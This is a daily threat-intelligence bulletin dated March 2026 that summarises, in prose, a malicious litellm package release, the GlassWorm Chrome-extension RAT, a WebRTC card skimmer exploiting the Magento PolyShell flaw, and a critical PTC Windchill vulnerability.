Cyware Daily Threat Intelligence, March 26, 2026

The software supply chain has reached a critical breaking point as TeamPCP weaponizes the "litellm" Python library to pivot from security scanners to core AI infrastructure. Now collaborating with the LAPSUS$ extortion group, TeamPCP is actively mining 300 GB of stolen data to target multi-billion-dollar enterprises.

Developer ecosystems are facing a resilient new threat as the GlassWorm campaign evolves into a multi-stage offensive involving Solana-based command-and-control. The latest wave of attacks utilizes a deceptive Google Chrome extension—disguised as an offline version of Google Docs—to log keystrokes, capture screenshots, and siphons session tokens from infected workstations.

E-commerce security is under siege as a mass exploitation campaign targets a critical "perfect 10" vulnerability in Magento and Adobe Commerce, known as PolyShell. Since automated scanning began on March 19, over 56% of vulnerable storefronts have been hit by unauthenticated attackers utilizing the REST API to upload "polyglot" files.

Top Malware Reported in the Last 24 Hours

TeamPCP compromises LiteLLM Python package

TeamPCP, a threat actor, has successfully compromised the popular Python package "litellm," releasing malicious versions 1.82.7 and 1.82.8 that include a credential harvester, a Kubernetes lateral movement toolkit, and a persistent backdoor. These versions were published on March 24, and exploit vulnerabilities in CI/CD workflows, allowing them to sweep sensitive data such as SSH keys and cloud credentials. The attack employs a multi-stage payload that executes automatically upon importing the package, significantly increasing its impact. As TeamPCP expands its operations, it collaborates with the notorious extortion group LAPSUS$, targeting various ecosystems and emphasizing the vulnerabilities in the software supply chain. 

WebRTC skimmer bypasses CSP to steal data

Cybersecurity researchers have uncovered a new payment skimmer that leverages WebRTC data channels to exfiltrate payment data from e-commerce sites, effectively bypassing Content Security Policy (CSP) protections. This attack exploits the PolyShell vulnerability in Magento Open Source and Adobe Commerce, allowing unauthorized users to upload and execute malicious code via the REST API. Since March 19, this vulnerability has been widely exploited, with over 50 IP addresses involved in scanning activities, impacting 56.7% of vulnerable stores. The skimmer establishes a WebRTC peer connection to a hard-coded IP address, retrieving JavaScript code that steals payment information. 

GlassWorm malware delivers RAT via extensions

Cybersecurity researchers have identified a new evolution of the GlassWorm malware campaign, which uses a multi-stage framework to deliver a RAT capable of extensive data theft. The malware masquerades as a Google Chrome extension labeled as an offline version of Google Docs, enabling it to log keystrokes, capture screenshots, and exfiltrate cookies and session tokens. Initial access is gained through rogue packages published on platforms like npm and GitHub, while the C2 server details are hidden within Solana blockchain transactions. The malware can harvest credentials, exfiltrate cryptocurrency wallet data, and deploy a phishing interface targeting hardware wallets. This attack chain also includes a Websocket-based RAT that siphons browser data and executes arbitrary commands.

Top Vulnerabilities Reported in the Last 24 Hours

Critical vulnerability in PTC software identified

PTC Inc. has alerted users to a critical vulnerability (CVE-2026-4681) in its Windchill and FlexPLM product lifecycle management solutions, which could enable remote code execution through the deserialization of trusted data. This security issue has prompted urgent action from German authorities, with federal police (BKA) dispatched to inform affected companies of the potential cybersecurity risk. Although PTC is actively working on security patches for all supported versions, no official fixes are currently available. The company has not yet detected any exploitation of the vulnerability against its customers.

PolyShell vulnerability exploits over half of Magento stores

Attacks exploiting the PolyShell vulnerability in Magento Open Source and Adobe Commerce version 2 are currently affecting over 56% of vulnerable stores. This critical issue arises from the REST API, which allows file uploads that can lead to remote code execution or account takeover through stored cross-site scripting (XSS) if the web server configuration permits. Following the public disclosure of the vulnerability, mass exploitation began on March 19, 2026. Although Adobe released a patch in version 2.4.9-beta1 on March 10, it has not yet been implemented in stable versions. Additionally, some attacks are utilizing a novel WebRTC-based payment skimmer that bypasses security controls, making detection more challenging. Researchers have published a list of IP addresses associated with these attacks.